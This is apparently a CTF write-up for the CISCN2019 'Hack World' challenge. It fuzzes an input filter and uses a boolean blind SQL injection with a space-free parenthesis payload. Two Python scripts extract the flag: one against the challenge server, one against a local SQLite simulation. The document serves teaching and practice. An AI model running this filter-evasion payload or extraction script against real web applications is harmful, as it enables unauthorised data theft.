题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World
SQL injection
Manual testing shows that the input is filtered, so the first step is to fuzz which characters are blocked. Every probe whose response comes back with Length=482 is a filtered character: the blocked responses all share that one length, while valid and erroring queries come back with different lengths.
Testing the injection point shows that it is a boolean-based blind injection, so the flag can be queried directly: the content of the flag column in the flag table.
Trick
- Use parentheses `()` instead of spaces, since whitespace is filtered.
- Otherwise this is a routine blind injection. There is no need to enumerate the database, table or column names; they are given (table flag, column flag), so query the flag content directly. 102 is ascii('f'), the first character of the flag:
`id=(select(ascii(mid(flag,1,1))=102)from(flag))`
Extraction script
```python
# -*- coding:utf-8 -*-
# Author: mochu7
import requests
import string


def blind_injection(url):
    flag = ''
    strings = string.printable
    for num in range(1, 60):
        for i in strings:
            # Parentheses instead of spaces: whitespace is filtered by the target.
            payload = '(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num, ord(i))
            post_data = {"id": payload}
            res = requests.post(url=url, data=post_data)
            if 'Hello' in res.text:  # true branch: the guessed byte matched
                flag += i
                print(flag)
                break  # no need to try the remaining characters for this position
        else:
            # No printable character matched: past the end of the flag, stop.
            break
    print(flag)


if __name__ == '__main__':
    url = 'http://64368c9f-dd87-4c49-b9a1-d4b82e98c87a.node3.buuoj.cn/index.php'
    blind_injection(url)
```
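The fuzz step and the blind extraction above, as an added self-contained example that is not the author's script and needs no network: it stands in for the target with an in-memory SQLite database, registering MySQL's mid() and ascii() as Python functions so the page's payload runs unchanged. The blacklist (whitespace, comment markers, a few keywords) is an assumption for the simulation, the response bodies are constructed (only the 'Hello' substring in the true branch comes from the page), and the sample flag is made up. The extraction loop also stops at the end of the flag instead of always running 60 positions, and counts requests so the cost of equality-based guessing is visible.

```python
import sqlite3
import string

# Constructed sample data for the simulated target; not the challenge's real DB.
SAMPLE_FLAG = "flag{demo_blind_sqli}"

# Assumed blacklist for the simulation. The page only shows that filtered
# characters share one response length; the real list is not reproduced here.
BLACKLIST = (" ", "\t", "\n", "\r", "#", "--", "/*", "union", "or", "and")

# Constructed response bodies; only 'Hello' in the true branch is from the page.
TRUE_MARK = "Hello, the id exists."
FALSE_MARK = "No such id."
ERROR_MARK = "Error occurred when fetching the result."
BLOCKED_MARK = "SQL injection checked."


def make_db():
    """In-memory stand-in for the target database."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no MySQL mid()/ascii(); register equivalents so the MySQL
    # payload from the page runs unchanged. ascii('') is 0, as in MySQL.
    conn.create_function("mid", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.execute("CREATE TABLE flag(flag TEXT)")
    conn.execute("INSERT INTO flag VALUES (?)", (SAMPLE_FLAG,))
    conn.execute("CREATE TABLE users(id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "one"), (2, "two")])
    return conn


def target(conn, user_id):
    """Simulated vulnerable endpoint: blacklist check, then the id concatenated
    straight into the query (the bug), answering with one of three bodies."""
    lowered = user_id.lower()
    if any(bad in lowered for bad in BLACKLIST):
        return BLOCKED_MARK
    try:
        row = conn.execute("SELECT id FROM users WHERE id=" + user_id).fetchone()
    except sqlite3.Error:
        return ERROR_MARK
    if row is None:
        return ERROR_MARK
    return TRUE_MARK if row[0] == 1 else FALSE_MARK


def fuzz_filter(oracle, probe=string.printable):
    """Step 1 of the writeup: send id=1<c> for each candidate character and
    record the response length. Blocked characters all get the same body, so
    they cluster on a single length (the page's Length=482)."""
    return {c: len(oracle("1" + c)) for c in probe}


def extract_flag(oracle, max_len=60):
    """Step 2: boolean blind extraction with the page's payload, which uses
    parentheses instead of the filtered spaces. Stops when no printable
    character matches, i.e. past the end of the flag (ascii('') is 0)."""
    flag = ""
    requests_sent = 0
    for pos in range(1, max_len + 1):
        for ch in string.printable:
            payload = "(select(ascii(mid(flag,{0},1))={1})from(flag))".format(pos, ord(ch))
            requests_sent += 1
            if "Hello" in oracle(payload):  # true branch, as in the page's script
                flag += ch
                break
        else:
            break  # nothing matched: end of the flag
    return flag, requests_sent


if __name__ == "__main__":
    conn = make_db()
    oracle = lambda payload: target(conn, payload)
    lengths = fuzz_filter(oracle)
    # Group characters by response length; the largest uniform cluster of
    # non-error responses is the filtered set (here identified by its body).
    blocked = sorted(c for c, n in lengths.items() if n == len(BLOCKED_MARK))
    print("blocked by filter:", blocked)
    flag, n = extract_flag(oracle)
    print("recovered %r with %d requests" % (flag, n))
```

The oracle here is a local function; against the real challenge it would be a POST of the same payload and a check for 'Hello' in the body, as in the script above. Equality guessing costs up to 100 requests per character; if comparison operators survive the filter, a binary search over the ascii value cuts that to about seven.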